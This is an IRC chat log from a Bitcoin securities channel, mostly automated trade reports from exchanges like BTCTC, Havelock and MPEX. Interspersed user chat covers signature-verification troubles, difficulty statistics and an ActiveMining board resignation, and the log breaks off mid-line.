[BTCTC] [BITVPS] 8 @ 0.001801 = 0.0144 BTC [+] Sep 16 22:36:58 [BTCTC] [BITVPS] 1 @ 0.001801 BTC [+] Sep 16 22:38:10 [BTCTC] [BITVPS] 43 @ 0.0018 = 0.0774 BTC [-] Sep 16 22:41:02 [HAVELOCK] [CBTC] 1002 @ 0.0003925 = 0.3933 BTC [-] Sep 16 22:42:19 [HAVELOCK] [XBOND] 700 @ 0.0011999 = 0.8399 BTC [-] Sep 16 22:42:21 [BTCTC] [LABCOIN] 103 @ 0.002724 = 0.2806 BTC [-] Sep 16 22:42:27 [HAVELOCK] [XBOND] 13 @ 0.001199 = 0.0156 BTC [-] Sep 16 22:45:11 [MPEX] [S.MPOE] 5900 @ 0.00090776 = 5.3558 BTC [-] Sep 16 22:45:18 [MPEX] [S.MPOE] 3400 @ 0.00091007 = 3.0942 BTC [+] Sep 16 22:45:20 [BTCTC] [DMS.MINING] 49 @ 0.002373 = 0.1163 BTC [-] Sep 16 22:45:32 [BTCTC] [DMS.MINING] 359 @ 0.002372 = 0.8515 BTC [-] Sep 16 22:45:34 [BTCTC] [DMS.MINING] 9 @ 0.002368 = 0.0213 BTC [-] Sep 16 22:45:35 [BTCTC] [DMS.MINING] 1 @ 0.002341 BTC [-] Sep 16 22:45:36 [BTCTC] [DMS.MINING] 9 @ 0.002341 = 0.0211 BTC [-] Sep 16 22:45:38 [BTCTC] [DMS.MINING] 1 @ 0.002335 BTC [-] Sep 16 22:45:39 [BTCTC] [DMS.MINING] 44 @ 0.002335 = 0.1027 BTC [-] Sep 16 22:45:39 [BTCTC] [DMS.MINING] 750 @ 0.00233 = 1.7475 BTC [-] Sep 16 22:45:40 [BTCTC] [DMS.MINING] 90 @ 0.002311 = 0.208 BTC [-] Sep 16 22:45:41 [BTCTC] [DMS.MINING] 6 @ 0.00231 = 0.0139 BTC [-] Sep 16 22:45:42 [BTCTC] [DMS.MINING] 100 @ 0.002302 = 0.2302 BTC [-] Sep 16 22:45:43 [BTCTC] [DMS.MINING] 300 @ 0.002301 = 0.6903 BTC [-] Sep 16 22:45:45 [BTCTC] [DMS.MINING] 25 @ 0.002301 = 0.0575 BTC [-] Sep 16 22:45:46 [BTCTC] [DMS.MINING] 330 @ 0.0023 = 0.759 BTC [-] Sep 16 22:45:47 [BTCTC] [DMS.MINING] 127 @ 0.002291 = 0.291 BTC [-] Sep 16 22:46:23 [BTCTC] [LABCOIN] 78 @ 0.002724 = 0.2125 BTC [-] Sep 16 22:46:33 [HAVELOCK] [CBTC] 699 @ 0.0003925 = 0.2744 BTC [-] Sep 16 22:46:47 [BTCTC] [LABCOIN] 1 @ 0.002724 BTC [-] Sep 16 22:48:55 whazaaap everyone. I just wanted to thank you all for the many learning experiences I've had here. I lurk the logs when i can't access an IRC client... but u guys are the best... Sep 16 22:49:09 fanboy! Sep 16 22:49:13 totes Sep 16 22:49:18 ;) Sep 16 22:51:30 [BTCTC] [DMS.PURCHASE] 25 @ 0.009365 = 0.2341 BTC [-] Sep 16 22:51:30 [BTCTC] [DMS.MINING] 2 @ 0.002495 = 0.005 BTC [+] Sep 16 22:53:03 it's amazing chan Sep 16 22:53:03 AMAZING COMPANY! Sep 16 22:53:38 i see what you did there assbot Sep 16 22:53:45 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.000633 = 0.0019 BTC [+] Sep 16 22:54:05 Fun fact: FANBOYS, incidentally, is an acronym comprising all coordinating conjunctions in the English language. Sep 16 22:54:42 hmmmm Sep 16 22:54:48 interesting Sep 16 22:55:30 [HAVELOCK] [XBOND] 1 @ 0.00121048 BTC [+] Sep 16 22:56:44 [HAVELOCK] [AM100] 10 @ 0.02 = 0.2 BTC [+] Sep 16 22:57:41 good to know for when ill be on who wants to be a millionarie Sep 16 22:57:49 o, wait, too late for that Sep 16 22:58:20 [HAVELOCK] [DEALCO] 11 @ 0.00999999 = 0.11 BTC [+] Sep 16 22:59:06 The show is still going on Sep 16 22:59:26 It's never too late kakobrekla ;) Sep 16 23:02:11 [HAVELOCK] [LABCO] 3 @ 0.0028701 = 0.0086 BTC [-] Sep 16 23:02:12 thats not what i was trying to say, but anyway, lets move on Sep 16 23:04:29 [MPEX] [S.MPOE] 1803 @ 0.00091007 = 1.6409 BTC [+] Sep 16 23:04:31 [MPEX] [S.MPOE] 3324 @ 0.00091108 = 3.0284 BTC [+] Sep 16 23:04:38 [MPEX] [S.MPOE] 3817 @ 0.00091392 = 3.4884 BTC [+] Sep 16 23:06:29 [HAVELOCK] [AM100] 2 @ 0.0196 = 0.0392 BTC [-] Sep 16 23:06:32 [HAVELOCK] [AM100] 10 @ 0.01901 = 0.1901 BTC [-] Sep 16 23:06:34 [HAVELOCK] [AM100] 179 @ 0.01900001 = 3.401 BTC [-] Sep 16 23:06:36 [HAVELOCK] [AM100] 1 @ 0.019 BTC [-] Sep 16 23:07:04 kako won a million bucks? Sep 16 23:08:04 [BTCTC] [LABCOIN] 13 @ 0.002702 = 0.0351 BTC [-] Sep 16 23:08:05 [BTCTC] [LABCOIN] 13 @ 0.002702 = 0.0351 BTC [-] Sep 16 23:08:06 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:07 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:08 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:09 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:10 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:11 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:12 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:14 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:15 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:16 [BTCTC] [LABCOIN] 12 @ 0.002702 = 0.0324 BTC [-] Sep 16 23:08:16 [BTCTC] [LABCOIN] 9 @ 0.002702 = 0.0243 BTC [-] Sep 16 23:08:17 [BTCTC] [LABCOIN] 9 @ 0.002702 = 0.0243 BTC [-] Sep 16 23:08:18 [BTCTC] [LABCOIN] 10 @ 0.002701 = 0.027 BTC [-] Sep 16 23:08:19 [BTCTC] [LABCOIN] 201 @ 0.0027 = 0.5427 BTC [-] Sep 16 23:09:06 worth a million zimbabwe dollars Sep 16 23:09:32 ~ZWD Sep 16 23:09:34 [HAVELOCK] [XBOND] 345 @ 0.00121048 = 0.4176 BTC [+] Sep 16 23:11:52 [HAVELOCK] [CBTC] 310 @ 0.0004373 = 0.1356 BTC [+] Sep 16 23:12:27 [BTCTC] [ACTIVEMINING] 43 @ 0.002521 = 0.1084 BTC [+] Sep 16 23:14:44 [BTCTC] [BTC-GROWTH] 10 @ 0.099 = 0.99 BTC [-] Sep 16 23:15:41 [HAVELOCK] [CBTC] 690 @ 0.0004373 = 0.3017 BTC [+] Sep 16 23:16:43 [HAVELOCK] [AM100] 10 @ 0.01999 = 0.1999 BTC [+] Sep 16 23:16:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.01926 BTC [-] Sep 16 23:17:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.01926 BTC [-] Sep 16 23:20:07 [HAVELOCK] [CBTC] 611 @ 0.0003925 = 0.2398 BTC [-] Sep 16 23:22:49 [BTCTC] [DMS.MINING] 1 @ 0.00249 BTC [-] Sep 16 23:23:02 [BTCTC] [DMS.MINING] 2 @ 0.00249 = 0.005 BTC [-] Sep 16 23:24:46 [HAVELOCK] [HIM] 85 @ 0.163 = 13.855 BTC [+] Sep 16 23:24:52 [BTCTC] [BTC-GOLD] 12 @ 0.006015 = 0.0722 BTC [-] Sep 16 23:24:53 [BTCTC] [BTC-GOLD] 5 @ 0.006015 = 0.0301 BTC [-] Sep 16 23:24:55 [BTCTC] [BTC-GOLD] 3 @ 0.006 = 0.018 BTC [-] Sep 16 23:26:30 https://github.com/primecoin/primecoin/wiki/Primecoin-Reaches-13-primes-Milestone Sep 16 23:32:41 13 primes right after friday 13th Sep 16 23:32:55 totally wormhole Sep 16 23:34:11 [BTCTC] [DMS.PURCHASE] 2 @ 0.009365 = 0.0187 BTC [-] Sep 16 23:35:03 [BTCTC] [DMS.PURCHASE] 17 @ 0.009365 = 0.1592 BTC [-] Sep 16 23:35:55 ;;nethash Sep 16 23:35:55 999678.718195 Sep 16 23:36:00 ;;bcstats Sep 16 23:36:02 Current Blocks: 258364 | Current Difficulty: 1.1262854866634709E8 | Next Difficulty At Block: 260063 | Next Difficulty In: 1699 blocks | Next Difficulty In About: 1 week, 3 days, 8 hours, 38 minutes, and 2 seconds | Next Difficulty Estimate: 133012690.564 | Estimated Percent Change: 18.09856 Sep 16 23:36:02 ;;estimate Sep 16 23:36:03 Next difficulty estimate | 133012690.564 based on data since last change | 139651372.699 based on data for last three days Sep 16 23:36:26 [BTCTC] [DMS.MINING] 12 @ 0.002495 = 0.0299 BTC [+] Sep 16 23:38:07 [HAVELOCK] [SMG] 1554 @ 0.0002162 = 0.336 BTC [+] Sep 16 23:38:11 [HAVELOCK] [SMG] 125 @ 0.0002165 = 0.0271 BTC [+] Sep 16 23:38:13 [HAVELOCK] [SMG] 4821 @ 0.000217 = 1.0462 BTC [+] Sep 16 23:39:10 [HAVELOCK] [SMG] 259 @ 0.000217 = 0.0562 BTC [+] Sep 16 23:39:26 [BTCTC] [ACTIVEMINING] 4 @ 0.002521 = 0.0101 BTC [+] Sep 16 23:42:12 bitcoin signatures sooo suck Sep 16 23:42:30 same thing verifies on blockchain.info but not in bitcoin-qt Sep 16 23:42:41 yes they suck, but less than pgp Sep 16 23:42:49 so sad Sep 16 23:43:10 [BTCTC] [KENILWORTH] 1 @ 0.001603 BTC [-] Sep 16 23:44:21 like your mom Sep 16 23:44:49 how less than pgp? Sep 16 23:45:37 people constantly send me signed stuff that i cant verify Sep 16 23:45:52 cause of weirdo clients or stuff Sep 16 23:47:24 It's cause each damn client uses its own signing method like retards Sep 16 23:47:56 seems we have got same thing with bitcoin Sep 16 23:48:27 prolly problem with char encoding Sep 16 23:48:33 or /n/b Sep 16 23:53:45 It's because whenever someone signs something, they want that person to make the other end install the software so they can verify. They want to increase their share. Sep 16 23:54:04 jurov: then reproduce with non-senstive text. *sigh* Sep 16 23:54:04 [HAVELOCK] [AM100] 19 @ 0.018951 = 0.3601 BTC [-] Sep 16 23:54:28 ofc with non-sensitive text it works flawlessly Sep 16 23:54:42 what chars did ya use? Sep 16 23:54:49 The softwares are free and don't bring in revenue you say? It's a "lenght matters" type of issue. Sep 16 23:55:05 [HAVELOCK] [AM100] 10 @ 0.018951 = 0.1895 BTC [-] Sep 16 23:55:08 i don't see any non-ascii charts there Sep 16 23:55:13 *chars Sep 16 23:55:26 [BTCTC] [LABCOIN] 8 @ 0.002682 = 0.0215 BTC [-] Sep 16 23:55:27 [BTCTC] [LABCOIN] 8 @ 0.002682 = 0.0215 BTC [-] Sep 16 23:55:29 [BTCTC] [LABCOIN] 8 @ 0.002682 = 0.0215 BTC [-] Sep 16 23:55:30 [BTCTC] [LABCOIN] 8 @ 0.002682 = 0.0215 BTC [-] Sep 16 23:55:47 what is it then Sep 16 23:57:08 i don't know. even copied it back from b-qt to blockchain, verifies Sep 16 23:57:51 does it have new line or break Sep 16 23:58:08 [BTCTC] [LABCOIN] 8 @ 0.002683 = 0.0215 BTC [+] Sep 16 23:58:10 [BTCTC] [LABCOIN] 8 @ 0.002683 = 0.0215 BTC [+] Sep 16 23:58:34 yes i checked. there's exactly one newline in the end Sep 16 23:58:57 could be the sauce of the sauce Sep 17 00:01:09 brainwallet does verify it, too.. although it spits out completely different address Sep 17 00:01:17 amazing mess Sep 17 00:01:19 AMAZING COMPANY! Sep 17 00:03:12 jurov: out of curiosity, how long is the message? Sep 17 00:03:29 i fixed a signing bug in Electrum recently so I dealt with this exact issue Sep 17 00:04:14 2731 bytes Sep 17 00:05:52 [HAVELOCK] [AM100] 5 @ 0.01894001 = 0.0947 BTC [-] Sep 17 00:06:32 [MPEX] [S.MPOE] 21100 @ 0.00091295 = 19.2632 BTC [-] Sep 17 00:07:07 [HAVELOCK] [CFIG] 2 @ 0.14 = 0.28 BTC [-] Sep 17 00:07:42 is there a embedded delay when selling on campbx, even when selling at market price? Sep 17 00:07:44 [HAVELOCK] [AM100] 15 @ 0.018951 = 0.2843 BTC [+] Sep 17 00:08:35 [HAVELOCK] [LABCO] 12 @ 0.0028701 = 0.0344 BTC [-] Sep 17 00:08:56 [BTCTC] [BASIC-MINING] 3 @ 0.1042 = 0.3126 BTC [-] Sep 17 00:09:13 [HAVELOCK] [AM100] 48 @ 0.018951 = 0.9096 BTC [+] Sep 17 00:11:51 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] Sep 17 00:11:52 [BTCTC] [ASICMINER-PT] 2 @ 2.089 = 4.178 BTC [+] Sep 17 00:11:53 [BTCTC] [ASICMINER-PT] 1 @ 2.09 BTC [+] Sep 17 00:13:22 [HAVELOCK] [XBOND] 292 @ 0.001197 = 0.3495 BTC [-] Sep 17 00:14:15 [HAVELOCK] [LABCO] 82 @ 0.0028701 = 0.2353 BTC [-] Sep 17 00:17:42 [MPEX] [S.MPOE] 6402 @ 0.00091392 = 5.8509 BTC [+] Sep 17 00:17:43 [MPEX] [S.MPOE] 18598 @ 0.0009141 = 17.0004 BTC [+] Sep 17 00:19:41 [BTCTC] [BTC-GROWTH] 10 @ 0.099 = 0.99 BTC [-] Sep 17 00:19:51 [MPEX] [S.MPOE] 11702 @ 0.0009141 = 10.6968 BTC [+] Sep 17 00:19:59 [MPEX] [S.MPOE] 13298 @ 0.00091419 = 12.1569 BTC [+] Sep 17 00:22:29 [BTCTC] [LABCOIN] 8 @ 0.002686 = 0.0215 BTC [+] Sep 17 00:22:29 [BTCTC] [LABCOIN] 8 @ 0.002686 = 0.0215 BTC [+] Sep 17 00:22:30 [BTCTC] [LABCOIN] 7 @ 0.002686 = 0.0188 BTC [+] Sep 17 00:22:32 [BTCTC] [LABCOIN] 8 @ 0.002687 = 0.0215 BTC [+] Sep 17 00:22:33 [BTCTC] [LABCOIN] 639 @ 0.002719 = 1.7374 BTC [+] Sep 17 00:22:34 [BTCTC] [LABCOIN] 2030 @ 0.002721 = 5.5236 BTC [+] Sep 17 00:25:59 [MPEX] [S.MPOE] 22300 @ 0.00091315 = 20.3632 BTC [-] Sep 17 00:26:06 [HAVELOCK] [SMG] 100 @ 0.000191 = 0.0191 BTC [-] Sep 17 00:26:14 [HAVELOCK] [SMG] 340 @ 0.0001901 = 0.0646 BTC [-] Sep 17 00:27:19 [BTCTC] [DMS.MINING] 1 @ 0.002495 BTC [+] Sep 17 00:28:45 ;;everify freenode:#bitcoin-otc:2a3c8e32b7ffdcca25593fd281c7f87d6e0b89253d35417911c668c4 Sep 17 00:28:46 You are now authenticated for user jurov with key 677ABD62D0AEE7D7 Sep 17 00:29:47 [HAVELOCK] [AM100] 5 @ 0.01998 = 0.0999 BTC [+] Sep 17 00:30:02 [HAVELOCK] [LABCO] 9 @ 0.0028701 = 0.0258 BTC [-] Sep 17 00:35:39 [HAVELOCK] [XBOND] 8 @ 0.00121048 = 0.0097 BTC [+] Sep 17 00:38:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.01924 BTC [-] Sep 17 00:43:03 [BTCTC] [DMS.SELLING] 347 @ 0.0069 = 2.3943 BTC [-] Sep 17 00:43:29 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.000632 = 0.0013 BTC [-] Sep 17 00:46:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000632 BTC [-] Sep 17 00:46:47 [BTCTC] [ACTIVEMINING] 200 @ 0.002679 = 0.5358 BTC [+] Sep 17 00:54:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.01923 = 0.0385 BTC [-] Sep 17 00:56:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.01922 = 0.1922 BTC [-] Sep 17 01:09:06 [BTCTC] [ACTIVEMINING] 399 @ 0.002692 = 1.0741 BTC [+] Sep 17 01:09:07 [BTCTC] [ACTIVEMINING] 268 @ 0.002695 = 0.7223 BTC [+] Sep 17 01:09:08 [BTCTC] [ACTIVEMINING] 33 @ 0.0027 = 0.0891 BTC [+] Sep 17 01:12:12 activemining's advisory board stepped down apparently Sep 17 01:13:14 whoa Sep 17 01:13:41 Read the scoop: https://bitcointalk.org/index.php?topic=252531.msg3169200#msg3169200 Sep 17 01:13:43 https://bitcointalk.org/index.php?topic=252531.msg3169200#msg3169200 Sep 17 01:13:50 [ActiveMining] The Official Active Mining Discussion Thread Sep 17 01:14:31 "1) Some members of the board wish to pursue other avenues within the Bitcoin world that are tied to potential conflicts of time and interest, so the ethical choice is to step-down." i read that as "we want to gamble on labcoin instead" Sep 17 01:14:32 [HAVELOCK] [AM100] 1 @ 0.01998 BTC [+] Sep 17 01:15:28 Duffer1, I HIGHLY doubt that is the issue... lol. Sep 17 01:15:45 lol no i know, i'm just teasin Sep 17 01:15:57 :P Sep 17 01:16:06 DEM DIVS ARE COMING THO! Sep 17 01:16:12 JUSTYOU WAIT Sep 17 01:16:16 hehe Sep 17 01:19:32 wouldn't take much of a dump to utterly destroy the price of am Sep 17 01:20:14 on btctc Sep 17 01:20:15 [HAVELOCK] [CBTC] 7000 @ 0.000393 = 2.751 BTC [+] Sep 17 01:21:47 [HAVELOCK] [CBTC] 5000 @ 0.00042 = 2.1 BTC [+] Sep 17 01:21:48 the board wasnt exactly a mahor loss... Sep 17 01:21:53 major* Sep 17 01:21:56 [HAVELOCK] [CBTC] 200 @ 0.000438 = 0.0876 BTC [+] Sep 17 01:22:07 [HAVELOCK] [CBTC] 11000 @ 0.000439 = 4.829 BTC [+] Sep 17 01:22:22 right but it's only 74B to .0018 Sep 17 01:22:35 They were good dudes, with good ideas. Most of what they did was PR (as far as holders could see) and now they're getting a Full-time PR Firm to do that. Sep 17 01:30:21 [BTCTC] [DMS.PURCHASE] 9 @ 0.009365 = 0.0843 BTC [-] Sep 17 01:32:16 [BTCTC] [CIPHERMINE-PT] 3 @ 0.0518 = 0.1554 BTC [-] Sep 17 01:32:16 [BTCTC] [CIPHERMINE-PT] 17 @ 0.05015 = 0.8526 BTC [-] Sep 17 01:32:18 [BTCTC] [CIPHERMINE-PT] 30 @ 0.05015 = 1.5045 BTC [-] Sep 17 01:34:25 [BTCTC] [BMF] 1 @ 0.02901 BTC [-] Sep 17 01:34:48 [BTCTC] [BTC-GOLD] 1 @ 0.006 BTC [-] Sep 17 01:39:58 [BTCTC] [CIPHERMINE-PT] 10 @ 0.0517 = 0.517 BTC [+] Sep 17 01:42:41 [MPEX] [S.MPOE] 3334 @ 0.00091342 = 3.0453 BTC [+] Sep 17 01:42:43 [MPEX] [S.MPOE] 966 @ 0.00091315 = 0.8821 BTC [-] Sep 17 01:46:43 [BTCTC] [ACTIVEMINING] 52 @ 0.002533 = 0.1317 BTC [-] Sep 17 01:49:47 [BTCTC] [TAT.ASICMINER] 12 @ 0.01924 = 0.2309 BTC [+] Sep 17 01:57:12 [BTCTC] [BTC-GROWTH] 3 @ 0.099 = 0.297 BTC [-] Sep 17 01:59:39 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0006319 = 0.0063 BTC [-] Sep 17 02:01:29 [HAVELOCK] [CBTC] 2000 @ 0.00044 = 0.88 BTC [+] Sep 17 02:01:32 [HAVELOCK] [CBTC] 40000 @ 0.00045 = 18 BTC [+] Sep 17 02:01:34 [HAVELOCK] [CBTC] 1000 @ 0.00045 = 0.45 BTC [+] Sep 17 02:02:39 [HAVELOCK] [CBTC] 14170 @ 0.000494 = 7 BTC [+] Sep 17 02:07:55 [HAVELOCK] [AM100] 3 @ 0.01998 = 0.0599 BTC [+] Sep 17 02:09:59 [BTCTC] [RSM] 29 @ 0.00672 = 0.1949 BTC [+] Sep 17 02:13:47 [MPEX] [S.MPOE] 7753 @ 0.00091361 = 7.0832 BTC [+] (2 ops) Sep 17 02:14:18 [MPEX] [S.MPOE] 929 @ 0.00091419 = 0.8493 BTC [+] Sep 17 02:18:52 [HAVELOCK] [XBOND] 1000 @ 0.0012 = 1.2 BTC [-] Sep 17 02:32:17 [BTCTC] [BASIC-MINING] 33 @ 0.1042 = 3.4386 BTC [-] Sep 17 02:40:25 [HAVELOCK] [HIM] 5 @ 0.165 = 0.825 BTC [+] Sep 17 02:50:23 [BTCTC] [DMS.MINING] 230 @ 0.00240901 = 0.5541 BTC [-] (4) Sep 17 02:51:24 [BTCTC] [DMS.MINING] 225 @ 0.00240897 = 0.542 BTC [-] (3) Sep 17 02:52:25 [BTCTC] [DMS.MINING] 125 @ 0.00240736 = 0.3009 BTC [-] (2) Sep 17 02:52:25 [BTCTC] [DMS.SELLING] 1000 @ 0.00699897 = 6.999 BTC [+] (2) Sep 17 02:52:25 [BTCTC] [DMS.PURCHASE] 1 @ 0.009365 BTC [-] Sep 17 02:52:25 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0006319 = 0.0013 BTC [-] Sep 17 02:53:26 [BTCTC] [DMS.MINING] 33 @ 0.0024 = 0.0792 BTC [-] Sep 17 02:53:26 [BTCTC] [DMS.SELLING] 975 @ 0.006999 = 6.824 BTC [+] Sep 17 03:02:35 [BTCTC] [DMS.PURCHASE] 25 @ 0.009365 = 0.2341 BTC [-] Sep 17 03:03:36 [MPEX] [S.MPOE] 9700 @ 0.0009165 = 8.8901 BTC [+] (2) Sep 17 03:04:37 [MPEX] [S.MPOE] 3927 @ 0.00091991 = 3.6125 BTC [+] Sep 17 03:07:40 [BTCTC] [BTC-GROWTH] 100 @ 0.09723877 = 9.7239 BTC [-] (8) Sep 17 03:08:41 [BTCTC] [BTC-GROWTH] 97 @ 0.09721493 = 9.4298 BTC [-] (7) Sep 17 03:08:41 [BTCTC] [ASICMINER-PT] 1 @ 2.055 BTC [-] Sep 17 03:09:42 [BTCTC] [BTC-GROWTH] 95 @ 0.0971984 = 9.2338 BTC [-] (6) Sep 17 03:09:42 [BTCTC] [CIPHERMINE.B1] 300 @ 0.01031 = 3.093 BTC [-] (2) Sep 17 03:10:43 [BTCTC] [BTC-GROWTH] 80 @ 0.09719436 = 7.7755 BTC [-] (5) Sep 17 03:10:43 [BTCTC] [CIPHERMINE.B1] 250 @ 0.01031 = 2.5775 BTC [-] Sep 17 03:10:43 [BTCTC] [ASICMINER-PT] 1 @ 2.054 BTC [-] Sep 17 03:11:44 [BTCTC] [BTC-GROWTH] 79 @ 0.09719416 = 7.6783 BTC [-] (4) Sep 17 03:11:44 [BTCTC] [LABCOIN] 1904 @ 0.00272526 = 5.1889 BTC [+] (38) Sep 17 03:11:44 [BTCTC] [DMS.MINING] 10 @ 0.002371 = 0.0237 BTC [-] Sep 17 03:12:44 What's the general sentiment of the ActiveMining advisory board stepping down? Sep 17 03:12:45 [BTCTC] [BTC-GROWTH] 30 @ 0.09716833 = 2.915 BTC [-] (3) Sep 17 03:12:45 [BTCTC] [LABCOIN] 2496 @ 0.00273098 = 6.8165 BTC [+] (39) Sep 17 03:13:03 I actually expected more reaction from the market. Sep 17 03:13:30 I suppose it's encouraging, though perplexing, given how fickle people normally are when it comes to bitcoin securities. Sep 17 03:13:46 [BTCTC] [BTC-GROWTH] 10 @ 0.097105 = 0.9711 BTC [-] (2) Sep 17 03:13:46 [BTCTC] [LABCOIN] 2488 @ 0.00273108 = 6.7949 BTC [+] (38) Sep 17 03:14:46 [BTCTC] [BTC-GROWTH] 5 @ 0.0971 = 0.4855 BTC [-] Sep 17 03:14:47 [BTCTC] [LABCOIN] 2480 @ 0.00273119 = 6.7734 BTC [+] (37) Sep 17 03:14:47 [BTCTC] [DMS.SELLING] 3 @ 0.006999 = 0.021 BTC [+] Sep 17 03:15:47 [BTCTC] [LABCOIN] 2472 @ 0.00273129 = 6.7517 BTC [+] (36) Sep 17 03:16:48 [BTCTC] [LABCOIN] 2464 @ 0.00273139 = 6.7301 BTC [+] (35) Sep 17 03:17:49 [BTCTC] [LABCOIN] 2456 @ 0.00273149 = 6.7085 BTC [+] (34) Sep 17 03:17:50 [BTCTC] [CIPHERMINE.B1] 116 @ 0.01027 = 1.1913 BTC [-] (2) Sep 17 03:18:09 Urushiol: alternative explanation is everyone knows ActM is a scam and nobody minds Sep 17 03:18:16 lol Sep 17 03:18:35 hah, that is indeed a possibility. Sep 17 03:18:51 [BTCTC] [LABCOIN] 2448 @ 0.00273159 = 6.6869 BTC [+] (33) Sep 17 03:18:51 [BTCTC] [CIPHERMINE.B1] 1 @ 0.01027 BTC [-] Sep 17 03:19:55 [BTCTC] [LABCOIN] 2418 @ 0.00273199 = 6.606 BTC [+] (32) Sep 17 03:20:53 [BTCTC] [LABCOIN] 2410 @ 0.00273209 = 6.5843 BTC [+] (31) Sep 17 03:21:54 [BTCTC] [LABCOIN] 2403 @ 0.00273219 = 6.5655 BTC [+] (30) Sep 17 03:22:09 cool what do the (32) means? Sep 17 03:22:55 [BTCTC] [LABCOIN] 2396 @ 0.00273228 = 6.5465 BTC [+] (29) Sep 17 03:23:18 you mean the numbers at the end? Sep 17 03:23:21 those are lotto numbers Sep 17 03:23:56 [BTCTC] [LABCOIN] 2389 @ 0.00273237 = 6.5276 BTC [+] (28) Sep 17 03:24:57 [BTCTC] [LABCOIN] 2382 @ 0.00273247 = 6.5087 BTC [+] (27) Sep 17 03:24:57 [BTCTC] [DMS.SELLING] 2 @ 0.006999 = 0.014 BTC [+] Sep 17 03:24:57 [BTCTC] [DMS.MINING] 3129 @ 0.00253455 = 7.9306 BTC [+] (15) Sep 17 03:25:40 numbers from lost? Sep 17 03:25:58 [BTCTC] [LABCOIN] 2375 @ 0.00273257 = 6.4899 BTC [+] (26) Sep 17 03:25:58 [BTCTC] [DMS.MINING] 3735 @ 0.00255977 = 9.5607 BTC [+] (17) Sep 17 03:25:58 [BTCTC] [CIPHERMINE.B1] 97 @ 0.01026 = 0.9952 BTC [-] Sep 17 03:26:13 if those can win the lottery? Sep 17 03:26:59 [BTCTC] [LABCOIN] 2368 @ 0.00273266 = 6.4709 BTC [+] (25) Sep 17 03:26:59 [BTCTC] [DMS.MINING] 3706 @ 0.00256035 = 9.4887 BTC [+] (16) Sep 17 03:28:00 [BTCTC] [LABCOIN] 2362 @ 0.00273275 = 6.4548 BTC [+] (24) Sep 17 03:28:00 [BTCTC] [DMS.MINING] 3144 @ 0.00257365 = 8.0916 BTC [+] (15) Sep 17 03:29:01 [BTCTC] [LABCOIN] 3527 @ 0.00273848 = 9.6586 BTC [+] (26) Sep 17 03:29:01 [BTCTC] [DMS.MINING] 2812 @ 0.00258353 = 7.2649 BTC [+] (14) Sep 17 03:30:02 [BTCTC] [LABCOIN] 3521 @ 0.00273854 = 9.6424 BTC [+] (25) Sep 17 03:30:02 [BTCTC] [DMS.MINING] 2015 @ 0.00261661 = 5.2725 BTC [+] (13) Sep 17 03:31:03 [BTCTC] [LABCOIN] 3515 @ 0.00273861 = 9.6262 BTC [+] (24) Sep 17 03:31:03 [BTCTC] [DMS.MINING] 1978 @ 0.0026221 = 5.1865 BTC [+] (14) Sep 17 03:32:04 [BTCTC] [LABCOIN] 3507 @ 0.00273867 = 9.6045 BTC [+] (23) Sep 17 03:32:04 [BTCTC] [DMS.MINING] 1947 @ 0.00262357 = 5.1081 BTC [+] (13) Sep 17 03:33:05 [BTCTC] [LABCOIN] 3495 @ 0.00273873 = 9.5719 BTC [+] (22) Sep 17 03:33:05 [BTCTC] [DMS.MINING] 1551 @ 0.00264722 = 4.1058 BTC [+] (12) Sep 17 03:34:06 [BTCTC] [LABCOIN] 3483 @ 0.00273878 = 9.5392 BTC [+] (21) Sep 17 03:34:06 [BTCTC] [DMS.MINING] 1501 @ 0.00265046 = 3.9783 BTC [+] (11) Sep 17 03:35:07 [BTCTC] [LABCOIN] 3471 @ 0.00273883 = 9.5065 BTC [+] (20) Sep 17 03:35:07 [BTCTC] [DMS.MINING] 1498 @ 0.00265056 = 3.9705 BTC [+] (10) Sep 17 03:36:08 [BTCTC] [LABCOIN] 3459 @ 0.00273888 = 9.4738 BTC [+] (19) Sep 17 03:36:08 [BTCTC] [DMS.MINING] 1298 @ 0.00265835 = 3.4505 BTC [+] (9) Sep 17 03:38:09 [BTCTC] [LABCOIN] 3450 @ 0.00273892 = 9.4493 BTC [+] (18) Sep 17 03:38:10 [BTCTC] [DMS.MINING] 976 @ 0.002674 = 2.6098 BTC [+] (8) Sep 17 03:38:10 [BTCTC] [DMS.SELLING] 9 @ 0.0069 = 0.0621 BTC [-] Sep 17 03:38:10 [BTCTC] [ASICMINER-PT] 2 @ 2.054 = 4.108 BTC [-] (2) Sep 17 03:39:11 [BTCTC] [LABCOIN] 3441 @ 0.00273896 = 9.4248 BTC [+] (17) Sep 17 03:39:11 [BTCTC] [DMS.MINING] 876 @ 0.00267674 = 2.3448 BTC [+] (7) Sep 17 03:39:11 [BTCTC] [ASICMINER-PT] 6 @ 2.05066666 = 12.304 BTC [-] (2) Sep 17 03:41:49 [BTCTC] [LABCOIN] 3426 @ 0.00273902 = 9.3839 BTC [+] (16) Sep 17 03:41:49 [BTCTC] [DMS.MINING] 676 @ 0.00268318 = 1.8138 BTC [+] (6) Sep 17 03:41:50 [BTCTC] [ASICMINER-PT] 5 @ 2.05 = 10.25 BTC [-] Sep 17 03:43:56 [MPEX] [S.MPOE] 16100 @ 0.00091641 = 14.7542 BTC [-] Sep 17 03:47:55 [BTCTC] [LABCOIN] 